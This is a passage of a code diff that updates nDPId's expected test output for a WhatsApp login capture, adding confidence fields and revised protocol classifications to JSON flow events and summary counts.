 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432582401886,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1432582401886,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFcAAP8Rdk4AAAAA\/\/\/\/\/wBEAEMBNOddAQEGALYzLg4AAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1432582402666,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1432582402666,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1432582402666,"pkt":"AQBeAAD7APS5Jrv0CABFAABNW6AAAP8RvFfAqAIE4AAA+xTpFOkAOcRNAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAyAAQhfYWlycGxhecASAAyAAQ=="}
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1432582402666,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
+00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1432582402666,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1432582402667,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"ts_msec":1432582402667,"pkt":"MzMAAAD7APS5Jrv0ht1gCRl1ADkR\/\/6AAAAAAAAAGJzDGxKYAiT\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5eQMAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"}
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
+00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432582404307,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1432582404307,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFgAAP8Rdk0AAAAA\/\/\/\/\/wBEAEMBNOdaAQEGALYzLg4ABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"ts_msec":1432582411561,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu4AAC8GqngRbuUOwKgCBBRnwCnUixwguGhbLIAYAUleegAAAQEICm+JVxEt\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432582412221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"ts_msec":1432582412221,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu8AAC8GqncRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlb7AAAAQEICm+JWZ8t\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"}
 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582413522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"ts_msec":1432582413522,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJvAAAC8GqnYRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlW0AAAAQEICm+JXrst\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"}
 01123{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432582426553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1432582426553,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISk3sAAEARXw\/AqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582399902,"flow_last_seen":1432582425196,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1800,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582399902,"flow_last_seen":1432582425196,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1800,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582396509,"flow_last_seen":1432582426553,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
-00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582396509,"flow_last_seen":1432582426553,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00168{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","total-events-serialized":50}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 93/93
 ~~ skipped flows.............: 0
 ~~ total layer4 data length..: 24799 bytes
-~~ total detected protocols..: 8
+~~ total detected protocols..: 9
 ~~ total active/idle flows...: 9/9
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4613270 bytes
-~~ total memory freed........: 4613270 bytes
-~~ total allocations/frees...: 99673/99673
+~~ total memory allocated....: 4695599 bytes
+~~ total memory freed........: 4695599 bytes
+~~ total allocations/frees...: 101263/101263
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 173 chars
 ~~ json string max len.......: 2413 chars
diff --git a/test/results/whatsapp_voice_and_message.pcap.out b/test/results/whatsapp_voice_and_message.pcap.out
index ab54cf015..f205bb2a2 100644
--- a/test/results/whatsapp_voice_and_message.pcap.out
+++ b/test/results/whatsapp_voice_and_message.pcap.out
@@ -3,104 +3,101 @@
